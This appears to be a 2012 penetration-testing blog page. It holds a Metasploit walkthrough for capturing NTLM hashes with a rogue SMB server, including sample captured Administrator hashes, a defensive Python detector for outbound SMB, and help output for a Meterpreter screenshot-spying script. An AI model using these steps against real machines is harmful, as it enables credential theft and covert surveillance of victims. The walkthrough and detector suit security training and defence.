Showing posts with label capture. Show all posts

Friday, June 22, 2012

NTLM Authentication Hijack using Metasploit


Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Search for modules matching "smb"
Code:
msf > search smb
Step 2: Use the SMB capture auxiliary module to collect hashes
Code:
msf > use server/capture/smb
msf auxiliary(smb) > show options
...snip...
msf auxiliary(smb) > set PWFILE /tmp/captured_hashes.txt
msf auxiliary(smb) > set SRVHOST 192.168.1.252
msf auxiliary(smb) > run
Step 3: From the target machine, connect to our machine by using:
Code:
\\192.168.1.252\shared\xxx.jpg
Note: \shared\xxx.jpg is just a fake link (doesn’t exist).
Step 4: Switch back to our machine and check whether the hashes were captured
Code:
msf auxiliary(smb) >
[*] Captured 192.168.1.50:1038 LON-CL1\Administrator LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
Press Ctrl-C to stop the module and return to the msf console.
To display the captured hashes, change to the /tmp directory and print the file:
Code:
root@bt:/pentest/exploits/framework3# cd /tmp
root@bt:/tmp# cat captured_hashes.txt
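What the capture above depends on is the client in Step 3 being willing to open an SMB session to an arbitrary host and answer its NTLM challenge; the output line also shows an LM response, which this XP-era client still sends. From the defender's side the two controls are blocking SMB (TCP 139/445) to anything that is not an approved file server and restricting LM/NTLM on the clients. The following is an added example, not code from the original post or from Metasploit: a small Python detector that scans connection-log lines for outbound SMB to hosts outside an allowlist. The log format, the allowlist (192.168.1.10), the internal network and the external addresses are constructed assumptions; the 192.168.1.50 -> 192.168.1.252:445 line mirrors the connection recorded in Step 4.

```python
"""Flag outbound SMB connections to hosts that are not approved file servers.

Added example (assumptions: log format, allowlist and internal range are
constructed for this demo, not taken from the post or from Metasploit).
"""
import ipaddress
import re
from dataclasses import dataclass

SMB_PORTS = {139, 445}

# Constructed allowlist of legitimate SMB servers (assumption).
APPROVED_SMB_SERVERS = {ipaddress.ip_address("192.168.1.10")}

# Constructed firewall-style log lines:
# <timestamp> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <action>
SAMPLE_LOG = """\
2012-06-22T10:01:02 TCP 192.168.1.50:1037 -> 192.168.1.10:445 ALLOW
2012-06-22T10:01:05 TCP 192.168.1.50:1038 -> 192.168.1.252:445 ALLOW
2012-06-22T10:01:09 TCP 192.168.1.50:1039 -> 93.184.216.34:443 ALLOW
2012-06-22T10:02:11 TCP 192.168.1.51:2001 -> 10.0.0.5:139 ALLOW
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<action>\w+)$"
)


@dataclass(frozen=True)
class Finding:
    timestamp: str
    src: str
    dst: str
    dport: int
    reason: str


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec, approved, internal_net):
    """Return a Finding for SMB traffic to a non-approved host, else None."""
    dport = int(rec["dport"])
    if rec["proto"] != "TCP" or dport not in SMB_PORTS:
        return None  # not SMB, ignore
    dst = ipaddress.ip_address(rec["dst"])
    if dst in approved:
        return None  # known file server
    if dst not in internal_net:
        reason = "SMB to external host (client would hand its NTLM response to it)"
    else:
        reason = "SMB to unapproved internal host (possible rogue SMB server)"
    return Finding(rec["ts"], rec["src"], rec["dst"], dport, reason)


def find_suspicious_smb(log_text, approved=APPROVED_SMB_SERVERS,
                        internal_net=ipaddress.ip_network("192.168.1.0/24")):
    """Scan a block of log text and return all suspicious SMB findings in order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; a real collector would count these
        finding = classify(rec, approved, internal_net)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_suspicious_smb(SAMPLE_LOG):
        print(f"{f.timestamp} {f.src} -> {f.dst}:{f.dport}  {f.reason}")
```

On the sample log this reports two connections: the one to 192.168.1.252 (the host running the capture module in this post) and the one to 10.0.0.5 outside the internal range; the connection to the approved server and the HTTPS connection are ignored. In practice the same rule belongs at the perimeter as a deny for outbound 139/445, with the detector left in place to catch internal rogue servers.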

ScreenSpy – New Meterpreter Script



A new Meterpreter script named "ScreenSpy" was developed and added to Metasploit. The script captures screenshots from a remote victim system at a predefined interval and displays the image sequence on your attack system.
Code:
meterpreter > run screenspy -h
 
Screenspy v1.0
--------------
 
Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long.
Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long.
Usage:  bgrun screenspy -s windows -d 1 -t 60 => will take interactive  Screenshot every 1 sec for 1 min long, windows local mode.
 
Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com
 
OPTIONS:
 
-d   The Delay in seconds between each screenshot.
-h        Help menu.
-s   The local system linux/windows
-t   The time to run in sec.